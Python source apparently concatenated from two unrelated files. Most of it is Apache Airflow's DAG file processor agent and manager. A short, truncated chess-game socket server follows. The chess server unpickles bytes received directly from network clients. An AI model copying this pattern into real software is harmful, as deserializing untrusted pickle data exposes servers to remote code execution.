"""Processes a DAG file. See SchedulerJob.process_file() for more details."""
@abstractmethod
def start(self) -> None:
"""Launch the process to process the file"""
raise NotImplementedError()
@abstractmethod
def terminate(self, sigkill: bool = False):
"""Terminate (and then kill) the process launched to process the file"""
raise NotImplementedError()
@abstractmethod
def kill(self) -> None:
"""Kill the process launched to process the file, and ensure consistent state."""
raise NotImplementedError()
@property
@abstractmethod
def pid(self) -> int:
""":return: the PID of the process launched to process the given file"""
raise NotImplementedError()
@property
@abstractmethod
def exit_code(self) -> Optional[int]:
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
raise NotImplementedError()
@property
@abstractmethod
def done(self) -> bool:
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
raise NotImplementedError()
@property
@abstractmethod
def result(self) -> Optional[Tuple[int, int]]:
"""
A list of simple dags found, and the number of import errors
:return: result of running SchedulerJob.process_file() if available. Otherwise, none
:rtype: Optional[Tuple[int, int]]
"""
raise NotImplementedError()
@property
@abstractmethod
def start_time(self) -> datetime:
"""
:return: When this started to process the file
:rtype: datetime
"""
raise NotImplementedError()
@property
@abstractmethod
def file_path(self) -> str:
"""
:return: the path to the file that this is processing
:rtype: unicode
"""
raise NotImplementedError()
@property
@abstractmethod
def waitable_handle(self):
"""A "waitable" handle that can be passed to ``multiprocessing.connection.wait()``"""
raise NotImplementedError()
class DagParsingStat(NamedTuple):
"""Information on processing progress"""
file_paths: List[str]
done: bool
all_files_processed: bool
class DagFileStat(NamedTuple):
"""Information about single processing of one file"""
num_dags: int
import_errors: int
last_finish_time: Optional[datetime]
last_duration: Optional[float]
run_count: int
class DagParsingSignal(enum.Enum):
"""All signals sent to parser."""
AGENT_RUN_ONCE = 'agent_run_once'
TERMINATE_MANAGER = 'terminate_manager'
END_MANAGER = 'end_manager'
class DagFileProcessorAgent(LoggingMixin, MultiprocessingStartMethodMixin):
"""
Agent for DAG file processing. It is responsible for all DAG parsing
related jobs in scheduler process. Mainly it can spin up DagFileProcessorManager
in a subprocess, collect DAG parsing results from it and communicate
signal/DAG parsing stat with it.
This class runs in the main `airflow scheduler` process.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: str
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_factory: function that creates processors for DAG
definition files. Arguments are (dag_definition_path, log_file_path)
:type processor_factory: ([str, List[CallbackRequest], Optional[List[str]], bool]) -> (
AbstractDagFileProcessorProcess
)
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param pickle_dags: whether to pickle DAGs.
:type: pickle_dags: bool
:param async_mode: Whether to start agent in async mode
:type async_mode: bool
"""
def __init__(
self,
dag_directory: str,
max_runs: int,
processor_factory: Callable[
[str, List[CallbackRequest], Optional[List[str]], bool], AbstractDagFileProcessorProcess
],
processor_timeout: timedelta,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool,
):
super().__init__()
self._file_path_queue: List[str] = []
self._dag_directory: str = dag_directory
self._max_runs = max_runs
self._processor_factory = processor_factory
self._processor_timeout = processor_timeout
self._dag_ids = dag_ids
self._pickle_dags = pickle_dags
self._async_mode = async_mode
# Map from file path to the processor
self._processors: Dict[str, AbstractDagFileProcessorProcess] = {}
# Pipe for communicating signals
self._process: Optional[multiprocessing.process.BaseProcess] = None
self._done: bool = False
# Initialized as true so we do not deactivate w/o any actual DAG parsing.
self._all_files_processed = True
self._parent_signal_conn: Optional[MultiprocessingConnection] = None
self._last_parsing_stat_received_at: float = time.monotonic()
def start(self) -> None:
"""Launch DagFileProcessorManager processor and start DAG parsing loop in manager."""
mp_start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(mp_start_method)
self._last_parsing_stat_received_at = time.monotonic()
self._parent_signal_conn, child_signal_conn = context.Pipe()
process = context.Process(
target=type(self)._run_processor_manager,
args=(
self._dag_directory,
self._max_runs,
# getattr prevents error while pickling an instance method.
getattr(self, "_processor_factory"),
self._processor_timeout,
child_signal_conn,
self._dag_ids,
self._pickle_dags,
self._async_mode,
),
)
self._process = process
process.start()
self.log.info("Launched DagFileProcessorManager with pid: %s", process.pid)
def run_single_parsing_loop(self) -> None:
"""
Should only be used when launched DAG file processor manager in sync mode.
Send agent heartbeat signal to the manager, requesting that it runs one
processing "loop".
Call wait_until_finished to ensure that any launched processors have
finished before continuing
"""
if not self._parent_signal_conn or not self._process:
raise ValueError("Process not started.")
if not self._process.is_alive():
return
try:
self._parent_signal_conn.send(DagParsingSignal.AGENT_RUN_ONCE)
except ConnectionError:
# If this died cos of an error then we will noticed and restarted
# when harvest_serialized_dags calls _heartbeat_manager.
pass
def send_callback_to_execute(self, request: CallbackRequest) -> None:
"""
Sends information about the callback to be executed by DagFileProcessor.
:param request: Callback request to be executed.
:type request: CallbackRequest
"""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
try:
self._parent_signal_conn.send(request)
except ConnectionError:
# If this died cos of an error then we will noticed and restarted
# when harvest_serialized_dags calls _heartbeat_manager.
pass
def send_sla_callback_request_to_execute(self, full_filepath: str, dag_id: str) -> None:
"""
Sends information about the SLA callback to be executed by DagFileProcessor.
:param full_filepath: DAG File path
:type full_filepath: str
:param dag_id: DAG ID
:type dag_id: str
"""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
try:
request = SlaCallbackRequest(full_filepath=full_filepath, dag_id=dag_id)
self._parent_signal_conn.send(request)
except ConnectionError:
# If this died cos of an error then we will noticed and restarted
# when harvest_serialized_dags calls _heartbeat_manager.
pass
def wait_until_finished(self) -> None:
"""Waits until DAG parsing is finished."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
while self._parent_signal_conn.poll(timeout=None):
try:
result = self._parent_signal_conn.recv()
except EOFError:
break
self._process_message(result)
if isinstance(result, DagParsingStat):
# In sync mode we don't send this message from the Manager
# until all the running processors have finished
self._sync_metadata(result)
return
@staticmethod
def _run_processor_manager(
dag_directory: str,
max_runs: int,
processor_factory: Callable[[str, List[CallbackRequest]], AbstractDagFileProcessorProcess],
processor_timeout: timedelta,
signal_conn: MultiprocessingConnection,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool,
) -> None:
# Make this process start as a new process group - that makes it easy
# to kill all sub-process of this at the OS-level, rather than having
# to iterate the child processes
os.setpgid(0, 0)
setproctitle("airflow scheduler -- DagFileProcessorManager")
# Reload configurations and settings to avoid collision with parent process.
# Because this process may need custom configurations that cannot be shared,
# e.g. RotatingFileHandler. And it can cause connection corruption if we
# do not recreate the SQLA connection pool.
os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER'] = 'True'
os.environ['AIRFLOW__LOGGING__COLORED_CONSOLE_LOG'] = 'False'
# Replicating the behavior of how logging module was loaded
# in logging_config.py
importlib.reload(import_module(airflow.settings.LOGGING_CLASS_PATH.rsplit('.', 1)[0])) # type: ignore
importlib.reload(airflow.settings)
airflow.settings.initialize()
del os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER']
processor_manager = DagFileProcessorManager(
dag_directory,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
dag_ids,
pickle_dags,
async_mode,
)
processor_manager.start()
def heartbeat(self) -> None:
"""Check if the DagFileProcessorManager process is alive, and process any pending messages"""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
# Receive any pending messages before checking if the process has exited.
while self._parent_signal_conn.poll(timeout=0.01):
try:
result = self._parent_signal_conn.recv()
except (EOFError, ConnectionError):
break
self._process_message(result)
# If it died unexpectedly restart the manager process
self._heartbeat_manager()
def _process_message(self, message):
self.log.debug("Received message of type %s", type(message).__name__)
if isinstance(message, DagParsingStat):
self._sync_metadata(message)
else:
raise RuntimeError(f"Unexpected message received of type {type(message).__name__}")
def _heartbeat_manager(self):
"""Heartbeat DAG file processor and restart it if we are not done."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
if self._process and not self._process.is_alive():
self._process.join(timeout=0)
if not self.done:
self.log.warning(
"DagFileProcessorManager (PID=%d) exited with exit code %d - re-launching",
self._process.pid,
self._process.exitcode,
)
self.start()
if self.done:
return
parsing_stat_age = time.monotonic() - self._last_parsing_stat_received_at
if parsing_stat_age > self._processor_timeout.total_seconds():
Stats.incr('dag_processing.manager_stalls')
self.log.error(
"DagFileProcessorManager (PID=%d) last sent a heartbeat %.2f seconds ago! Restarting it",
self._process.pid,
parsing_stat_age,
)
reap_process_group(self._process.pid, logger=self.log)
self.start()
def _sync_metadata(self, stat):
"""Sync metadata from stat queue and only keep the latest stat."""
self._done = stat.done
self._all_files_processed = stat.all_files_processed
self._last_parsing_stat_received_at = time.monotonic()
@property
def done(self) -> bool:
"""Has DagFileProcessorManager ended?"""
return self._done
@property
def all_files_processed(self):
"""Have all files been processed at least once?"""
return self._all_files_processed
def terminate(self):
"""
Send termination signal to DAG parsing processor manager
and expect it to terminate all DAG file processors.
"""
if self._process and self._process.is_alive():
self.log.info("Sending termination message to manager.")
try:
self._parent_signal_conn.send(DagParsingSignal.TERMINATE_MANAGER)
except ConnectionError:
pass
def end(self):
"""
Terminate (and then kill) the manager process launched.
:return:
"""
if not self._process:
self.log.warning('Ending without manager process.')
return
# Give the Manager some time to cleanly shut down, but not too long, as
# it's better to finish sooner than wait for (non-critical) work to
# finish
self._process.join(timeout=1.0)
reap_process_group(self._process.pid, logger=self.log)
self._parent_signal_conn.close()
class DagFileProcessorManager(LoggingMixin): # pylint: disable=too-many-instance-attributes
"""
Given a list of DAG definition files, this kicks off several processors
in parallel to process them and put the results to a multiprocessing.Queue
for DagFileProcessorAgent to harvest. The parallelism is limited and as the
processors finish, more are launched. The files are processed over and
over again, but no more often than the specified interval.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: unicode
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_factory: function that creates processors for DAG
definition files. Arguments are (dag_definition_path)
:type processor_factory: (unicode, unicode, list) -> (AbstractDagFileProcessorProcess)
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param signal_conn: connection to communicate signal with processor agent.
:type signal_conn: MultiprocessingConnection
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param pickle_dags: whether to pickle DAGs.
:type pickle_dags: bool
:param async_mode: whether to start the manager in async mode
:type async_mode: bool
"""
def __init__(
self,
dag_directory: str,
max_runs: int,
processor_factory: Callable[[str, List[CallbackRequest]], AbstractDagFileProcessorProcess],
processor_timeout: timedelta,
signal_conn: MultiprocessingConnection,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool = True,
):
super().__init__()
self._file_paths: List[str] = []
self._file_path_queue: List[str] = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._processor_factory = processor_factory
self._signal_conn = signal_conn
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._async_mode = async_mode
self._parsing_start_time: Optional[int] = None
self._parallelism = conf.getint('scheduler', 'parsing_processes')
if 'sqlite' in conf.get('core', 'sql_alchemy_conn') and self._parallelism > 1:
self.log.warning(
"Because we cannot use more than 1 thread (parsing_processes = "
"%d ) when using sqlite. So we set parallelism to 1.",
self._parallelism,
)
self._parallelism = 1
# Parse and schedule each file no faster than this interval.
self._file_process_interval = conf.getint('scheduler', 'min_file_process_interval')
# How often to print out DAG file processing stats to the log. Default to
# 30 seconds.
self.print_stats_interval = conf.getint('scheduler', 'print_stats_interval')
# How many seconds do we wait for tasks to heartbeat before mark them as zombies.
self._zombie_threshold_secs = conf.getint('scheduler', 'scheduler_zombie_task_threshold')
# Should store dag file source in a database?
self.store_dag_code = STORE_DAG_CODE
# Map from file path to the processor
self._processors: Dict[str, AbstractDagFileProcessorProcess] = {}
self._num_run = 0
# Map from file path to stats about the file
self._file_stats: Dict[str, DagFileStat] = {}
self._last_zombie_query_time = None
# Last time that the DAG dir was traversed to look for files
self.last_dag_dir_refresh_time = timezone.make_aware(datetime.fromtimestamp(0))
# Last time stats were printed
self.last_stat_print_time = 0
# TODO: Remove magic number
self._zombie_query_interval = 10
# How long to wait before timing out a process to parse a DAG file
self._processor_timeout = processor_timeout
# How often to scan the DAGs directory for new files. Default to 5 minutes.
self.dag_dir_list_interval = conf.getint('scheduler', 'dag_dir_list_interval')
# Mapping file name and callbacks requests
self._callback_to_execute: Dict[str, List[CallbackRequest]] = defaultdict(list)
self._log = logging.getLogger('airflow.processor_manager')
self.waitables: Dict[Any, Union[MultiprocessingConnection, AbstractDagFileProcessorProcess]] = {
self._signal_conn: self._signal_conn,
}
def register_exit_signals(self):
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
# So that we ignore the debug dump signal, making it easier to send
signal.signal(signal.SIGUSR2, signal.SIG_IGN)
def _exit_gracefully(self, signum, frame): # pylint: disable=unused-argument
"""Helper method to clean up DAG file processors to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
self.log.debug("Current Stacktrace is: %s", '\n'.join(map(str, inspect.stack())))
self.terminate()
self.end()
self.log.debug("Finished terminating DAG processors.")
sys.exit(os.EX_OK)
def start(self):
"""
Use multiple processes to parse and generate tasks for the
DAGs in parallel. By processing them in separate processes,
we can get parallelism and isolation from potentially harmful
user code.
"""
self.register_exit_signals()
# Start a new process group
os.setpgid(0, 0)
self.log.info("Processing files using up to %s processes at a time ", self._parallelism)
self.log.info("Process each file at most once every %s seconds", self._file_process_interval)
self.log.info(
"Checking for new files in %s every %s seconds", self._dag_directory, self.dag_dir_list_interval
)
return self._run_parsing_loop()
def _run_parsing_loop(self):
# In sync mode we want timeout=None -- wait forever until a message is received
if self._async_mode:
poll_time = 0.0
else:
poll_time = None
self._refresh_dag_dir()
self.prepare_file_path_queue()
if self._async_mode:
# If we're in async mode, we can start up straight away. If we're
# in sync mode we need to be told to start a "loop"
self.start_new_processes()
while True:
loop_start_time = time.monotonic()
# pylint: disable=no-else-break
ready = multiprocessing.connection.wait(self.waitables.keys(), timeout=poll_time)
if self._signal_conn in ready:
agent_signal = self._signal_conn.recv()
self.log.debug("Received %s signal from DagFileProcessorAgent", agent_signal)
if agent_signal == DagParsingSignal.TERMINATE_MANAGER:
self.terminate()
break
elif agent_signal == DagParsingSignal.END_MANAGER:
self.end()
sys.exit(os.EX_OK)
elif agent_signal == DagParsingSignal.AGENT_RUN_ONCE:
# continue the loop to parse dags
pass
elif isinstance(agent_signal, CallbackRequest):
self._add_callback_to_queue(agent_signal)
else:
raise ValueError(f"Invalid message {type(agent_signal)}")
if not ready and not self._async_mode:
# In "sync" mode we don't want to parse the DAGs until we
# are told to (as that would open another connection to the
# SQLite DB which isn't a good practice
# This shouldn't happen, as in sync mode poll should block for
# ever. Lets be defensive about that.
self.log.warning(
"wait() unexpectedly returned nothing ready after infinite timeout (%r)!", poll_time
)
continue
for sentinel in ready:
if sentinel is self._signal_conn:
continue
processor = self.waitables.get(sentinel)
if not processor:
continue
self._collect_results_from_processor(processor)
self.waitables.pop(sentinel)
self._processors.pop(processor.file_path)
self._refresh_dag_dir()
self._find_zombies() # pylint: disable=no-value-for-parameter
self._kill_timed_out_processors()
# Generate more file paths to process if we processed all the files
# already.
if not self._file_path_queue:
self.emit_metrics()
self.prepare_file_path_queue()
self.start_new_processes()
# Update number of loop iteration.
self._num_run += 1
if not self._async_mode:
self.log.debug("Waiting for processors to finish since we're using sqlite")
# Wait until the running DAG processors are finished before
# sending a DagParsingStat message back. This means the Agent
# can tell we've got to the end of this iteration when it sees
# this type of message
self.wait_until_finished()
# Collect anything else that has finished, but don't kick off any more processors
self.collect_results()
self._print_stat()
all_files_processed = all(self.get_last_finish_time(x) is not None for x in self.file_paths)
max_runs_reached = self.max_runs_reached()
dag_parsing_stat = DagParsingStat(
self._file_paths,
max_runs_reached,
all_files_processed,
)
self._signal_conn.send(dag_parsing_stat)
if max_runs_reached:
self.log.info(
"Exiting dag parsing loop as all files have been processed %s times", self._max_runs
)
break
if self._async_mode:
loop_duration = time.monotonic() - loop_start_time
if loop_duration < 1:
poll_time = 1 - loop_duration
else:
poll_time = 0.0
def _add_callback_to_queue(self, request: CallbackRequest):
self._callback_to_execute[request.full_filepath].append(request)
# Callback has a higher priority over DAG Run scheduling
if request.full_filepath in self._file_path_queue:
self._file_path_queue.remove(request.full_filepath)
self._file_path_queue.insert(0, request.full_filepath)
def _refresh_dag_dir(self):
"""Refresh file paths from dag dir if we haven't done it for too long."""
now = timezone.utcnow()
elapsed_time_since_refresh = (now - self.last_dag_dir_refresh_time).total_seconds()
if elapsed_time_since_refresh > self.dag_dir_list_interval:
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self._dag_directory)
self._file_paths = list_py_file_paths(self._dag_directory)
self.last_dag_dir_refresh_time = now
self.log.info("There are %s files in %s", len(self._file_paths), self._dag_directory)
self.set_file_paths(self._file_paths)
try:
self.log.debug("Removing old import errors")
self.clear_nonexistent_import_errors() # pylint: disable=no-value-for-parameter
except Exception: # noqa pylint: disable=broad-except
self.log.exception("Error removing old import errors")
SerializedDagModel.remove_deleted_dags(self._file_paths)
DagModel.deactivate_deleted_dags(self._file_paths)
if self.store_dag_code:
from airflow.models.dagcode import DagCode
DagCode.remove_deleted_code(self._file_paths)
def _print_stat(self):
"""Occasionally print out stats about how fast the files are getting processed"""
if 0 < self.print_stats_interval < time.monotonic() - self.last_stat_print_time:
if self._file_paths:
self._log_file_processing_stats(self._file_paths)
self.last_stat_print_time = time.monotonic()
@provide_session
def clear_nonexistent_import_errors(self, session):
"""
Clears import errors for files that no longer exist.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
"""
query = session.query(errors.ImportError)
if self._file_paths:
query = query.filter(~errors.ImportError.filename.in_(self._file_paths))
query.delete(synchronize_session='fetch')
session.commit()
def _log_file_processing_stats(self, known_file_paths):
"""
Print out stats about how files are getting processed.
:param known_file_paths: a list of file paths that may contain Airflow
DAG definitions
:type known_file_paths: list[unicode]
:return: None
"""
# File Path: Path to the file containing the DAG definition
# PID: PID associated with the process that's processing the file. May
# be empty.
# Runtime: If the process is currently running, how long it's been
# running for in seconds.
# Last Runtime: If the process ran before, how long did it take to
# finish in seconds
# Last Run: When the file finished processing in the previous run.
headers = ["File Path", "PID", "Runtime", "# DAGs", "# Errors", "Last Runtime", "Last Run"]
rows = []
now = timezone.utcnow()
for file_path in known_file_paths:
last_runtime = self.get_last_runtime(file_path)
num_dags = self.get_last_dag_count(file_path)
num_errors = self.get_last_error_count(file_path)
file_name = os.path.basename(file_path)
file_name = os.path.splitext(file_name)[0].replace(os.sep, '.')
processor_pid = self.get_pid(file_path)
processor_start_time = self.get_start_time(file_path)
runtime = (now - processor_start_time) if processor_start_time else None
last_run = self.get_last_finish_time(file_path)
if last_run:
seconds_ago = (now - last_run).total_seconds()
Stats.gauge(f'dag_processing.last_run.seconds_ago.{file_name}', seconds_ago)
if runtime:
Stats.timing(f'dag_processing.last_duration.{file_name}', runtime)
rows.append((file_path, processor_pid, runtime, num_dags, num_errors, last_runtime, last_run))
# Sort by longest last runtime. (Can't sort None values in python3)
rows = sorted(rows, key=lambda x: x[3] or 0.0)
formatted_rows = []
for file_path, pid, runtime, num_dags, num_errors, last_runtime, last_run in rows:
formatted_rows.append(
(
file_path,
pid,
f"{runtime.total_seconds():.2f}s" if runtime else None,
num_dags,
num_errors,
f"{last_runtime:.2f}s" if last_runtime else None,
last_run.strftime("%Y-%m-%dT%H:%M:%S") if last_run else None,
)
)
log_str = (
"\n"
+ "=" * 80
+ "\n"
+ "DAG File Processing Stats\n\n"
+ tabulate(formatted_rows, headers=headers)
+ "\n"
+ "=" * 80
)
self.log.info(log_str)
def get_pid(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the PID of the process processing the given file or None if
the specified file is not being processed
:rtype: int
"""
if file_path in self._processors:
return self._processors[file_path].pid
return None
def get_all_pids(self):
"""
:return: a list of the PIDs for the processors that are running
:rtype: List[int]
"""
return [x.pid for x in self._processors.values()]
def get_last_runtime(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the runtime (in seconds) of the process of the last run, or
None if the file was never processed.
:rtype: float
"""
stat = self._file_stats.get(file_path)
return stat.last_duration if stat else None
def get_last_dag_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of dags loaded from that file, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.num_dags if stat else None
def get_last_error_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of import errors from processing, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.import_errors if stat else None
def get_last_finish_time(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the finish time of the process of the last run, or None if the
file was never processed.
:rtype: datetime
"""
stat = self._file_stats.get(file_path)
return stat.last_finish_time if stat else None
def get_start_time(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the start time of the process that's processing the
specified file or None if the file is not currently being processed
:rtype: datetime
"""
if file_path in self._processors:
return self._processors[file_path].start_time
return None
def get_run_count(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the number of times the given file has been parsed
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.run_count if stat else 0
def set_file_paths(self, new_file_paths):
"""
Update this with a new set of paths to DAG definition files.
:param new_file_paths: list of paths to DAG definition files
:type new_file_paths: list[unicode]
:return: None
"""
self._file_paths = new_file_paths
self._file_path_queue = [x for x in self._file_path_queue if x in new_file_paths]
# Stop processors that are working on deleted files
filtered_processors = {}
for file_path, processor in self._processors.items():
if file_path in new_file_paths:
filtered_processors[file_path] = processor
else:
self.log.warning("Stopping processor for %s", file_path)
Stats.decr('dag_processing.processes')
processor.terminate()
self._file_stats.pop(file_path)
self._processors = filtered_processors
def wait_until_finished(self):
"""Sleeps until all the processors are done."""
for processor in self._processors.values():
while not processor.done:
time.sleep(0.1)
def _collect_results_from_processor(self, processor) -> None:
self.log.debug("Processor for %s finished", processor.file_path)
Stats.decr('dag_processing.processes')
last_finish_time = timezone.utcnow()
if processor.result is not None:
num_dags, count_import_errors = processor.result
else:
self.log.error(
"Processor for %s exited with return code %s.", processor.file_path, processor.exit_code
)
count_import_errors = -1
num_dags = 0
stat = DagFileStat(
num_dags=num_dags,
import_errors=count_import_errors,
last_finish_time=last_finish_time,
last_duration=(last_finish_time - processor.start_time).total_seconds(),
run_count=self.get_run_count(processor.file_path) + 1,
)
self._file_stats[processor.file_path] = stat
def collect_results(self) -> None:
"""Collect the result from any finished DAG processors"""
ready = multiprocessing.connection.wait(self.waitables.keys() - [self._signal_conn], timeout=0)
for sentinel in ready:
if sentinel is self._signal_conn:
continue
processor = cast(AbstractDagFileProcessorProcess, self.waitables[sentinel])
self.waitables.pop(processor.waitable_handle)
self._processors.pop(processor.file_path)
self._collect_results_from_processor(processor)
self.log.debug("%s/%s DAG parsing processes running", len(self._processors), self._parallelism)
self.log.debug("%s file paths queued for processing", len(self._file_path_queue))
def start_new_processes(self):
"""Start more processors if we have enough slots and files to process"""
while self._parallelism - len(self._processors) > 0 and self._file_path_queue:
file_path = self._file_path_queue.pop(0)
callback_to_execute_for_file = self._callback_to_execute[file_path]
processor = self._processor_factory(
file_path, callback_to_execute_for_file, self._dag_ids, self._pickle_dags
)
del self._callback_to_execute[file_path]
Stats.incr('dag_processing.processes')
processor.start()
self.log.debug("Started a process (PID: %s) to generate tasks for %s", processor.pid, file_path)
self._processors[file_path] = processor
self.waitables[processor.waitable_handle] = processor
def prepare_file_path_queue(self):
"""Generate more file paths to process. Result are saved in _file_path_queue."""
self._parsing_start_time = time.perf_counter()
# If the file path is already being processed, or if a file was
# processed recently, wait until the next batch
file_paths_in_progress = self._processors.keys()
now = timezone.utcnow()
file_paths_recently_processed = []
for file_path in self._file_paths:
last_finish_time = self.get_last_finish_time(file_path)
if (
last_finish_time is not None
and (now - last_finish_time).total_seconds() < self._file_process_interval
):
file_paths_recently_processed.append(file_path)
files_paths_at_run_limit = [
file_path for file_path, stat in self._file_stats.items() if stat.run_count == self._max_runs
]
files_paths_to_queue = list(
set(self._file_paths)
- set(file_paths_in_progress)
- set(file_paths_recently_processed)
- set(files_paths_at_run_limit)
)
for file_path, processor in self._processors.items():
self.log.debug(
"File path %s is still being processed (started: %s)",
processor.file_path,
processor.start_time.isoformat(),
)
self.log.debug("Queuing the following files for processing:\n\t%s", "\n\t".join(files_paths_to_queue))
for file_path in files_paths_to_queue:
if file_path not in self._file_stats:
self._file_stats[file_path] = DagFileStat(
num_dags=0, import_errors=0, last_finish_time=None, last_duration=None, run_count=0
)
self._file_path_queue.extend(files_paths_to_queue)
@provide_session
def _find_zombies(self, session):
"""
Find zombie task instances, which are tasks haven't heartbeated for too long
and update the current zombie list.
"""
now = timezone.utcnow()
if (
not self._last_zombie_query_time
or (now - self._last_zombie_query_time).total_seconds() > self._zombie_query_interval
):
# to avoid circular imports
from airflow.jobs.local_task_job import LocalTaskJob as LJ
self.log.info("Finding 'running' jobs without a recent heartbeat")
TI = airflow.models.TaskInstance
DM = airflow.models.DagModel
limit_dttm = timezone.utcnow() - timedelta(seconds=self._zombie_threshold_secs)
self.log.info("Failing jobs without heartbeat after %s", limit_dttm)
zombies = (
session.query(TI, DM.fileloc)
.join(LJ, TI.job_id == LJ.id)
.join(DM, TI.dag_id == DM.dag_id)
.filter(TI.state == State.RUNNING)
.filter(
or_(
LJ.state != State.RUNNING,
LJ.latest_heartbeat < limit_dttm,
)
)
.all()
)
self._last_zombie_query_time = timezone.utcnow()
for ti, file_loc in zombies:
request = TaskCallbackRequest(
full_filepath=file_loc,
simple_task_instance=SimpleTaskInstance(ti),
msg="Detected as zombie",
)
self.log.info("Detected zombie job: %s", request)
self._add_callback_to_queue(request)
Stats.incr('zombies_killed')
def _kill_timed_out_processors(self):
"""Kill any file processors that timeout to defend against process hangs."""
now = timezone.utcnow()
for file_path, processor in self._processors.items():
duration = now - processor.start_time
if duration > self._processor_timeout:
self.log.error(
"Processor for %s with PID %s started at %s has timed out, killing it.",
file_path,
processor.pid,
processor.start_time.isoformat(),
)
Stats.decr('dag_processing.processes')
Stats.incr('dag_processing.processor_timeouts')
# TODO: Remove after Airflow 2.0
Stats.incr('dag_file_processor_timeouts')
processor.kill()
def max_runs_reached(self):
""":return: whether all file paths have been processed max_runs times"""
if self._max_runs == -1: # Unlimited runs.
return False
for stat in self._file_stats.values():
if stat.run_count < self._max_runs:
return False
if self._num_run < self._max_runs:
return False
return True
def terminate(self):
"""
Stops all running processors
:return: None
"""
for processor in self._processors.values():
Stats.decr('dag_processing.processes')
processor.terminate()
def end(self):
"""
Kill all child processes on exit since we don't want to leave
them as orphaned.
"""
pids_to_kill = self.get_all_pids()
if pids_to_kill:
kill_child_processes_by_pids(pids_to_kill)
def emit_metrics(self):
"""
Emit metrics about dag parsing summary
This is called once every time around the parsing "loop" - i.e. after
all files have been parsed.
"""
parse_time = time.perf_counter() - self._parsing_start_time
Stats.gauge('dag_processing.total_parse_time', parse_time)
Stats.gauge('dagbag_size', sum(stat.num_dags for stat in self._file_stats.values()))
Stats.gauge(
'dag_processing.import_errors', sum(stat.import_errors for stat in self._file_stats.values())
)
# pylint: disable=missing-docstring
@property
def file_paths(self):
return self._file_paths
|
server.py
|
import socket ## used for connecting users together ##
import threading ## used to manage each user in a seperate thread ##
import pickle # used to transfer data across the internet, similar to JSON ##
from chess.layoutBoardObject import Board ## used to get Board class to get an object and save each game in a list ##
# used for server side of chess
HEADER = 64
PORT = 5050
SERVER = socket.gethostbyname(socket.gethostname())
ADDRESS = (SERVER, PORT)
FORMAT = "utf-8"
DISCONNECT_MESSAGE = "!DISCONNECT"
totalConn = 0
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Found in TechWithTim game tutorial
try:
server.bind(ADDRESS)
except socket.error:
str(socket.error)
# This will store all games, first term = game number, second = actual board
allChessGames = {}
def handle_client(conn, address, chessGame, gameNumber):
global totalConn
print(f"NEW CONNECTION {address}")
# all games are full
colourId = "b"
if totalConn % 2 == 0:
colourId = "w"
# send what colour the player is
conn.send(colourId.encode(FORMAT))
# send board across socket by using pickle to "dump" it
boardString = pickle.dumps(chessGame)
conn.send(boardString)
totalConn += 1
connected = True
while connected:
d = conn.recv(1024)
try:
data = d.decode("utf-8")
except UnicodeDecodeError:
print(f"Bytes data = {d}")
print(f"Length of data = {len(d)}")
print(pickle.loads(d))
if not d:
break
if data == "":
continue
if data != "GetBoardPosition":
print(f"[DATA] = {data}")
if "Move" in data:
# for moving pieces
# "Move row column mousePos[0] mousePos[1]"
fullData = data.split(" ")
prevRow = int(fullData[1])
prevCol = int(fullData[2])
mousePosOne = int(fullData[3])
mousePosTwo = int(fullData[4])
mousePos = (mousePosOne, mousePosTwo)
print(fullData, mousePosOne // 70, (mousePosTwo - 110) // 70)
playerMoved = chessGame.movePossible(mousePos, prevCol, prevRow)
playerMoved = str(playerMoved)
conn.sendall(playerMoved.encode(FORMAT))
elif "GetPossibleMoves" in data:
# return the possible moves
possibleMoves = chessGame.possible
possibleMoves = pickle.dumps(possibleMoves)
conn.sendall(possibleMoves)
elif "GetBoardObject" in data:
# return the current board object
data = pickle.dumps(chessGame)
conn.sendall(data)
elif "SetPossible" in data:
# send message to confirm
conn.send("y".encode(FORMAT))
# Set the possible moves
print("[RECEIVED] Set Possible received")
possibleMoves = conn.recv(1024)
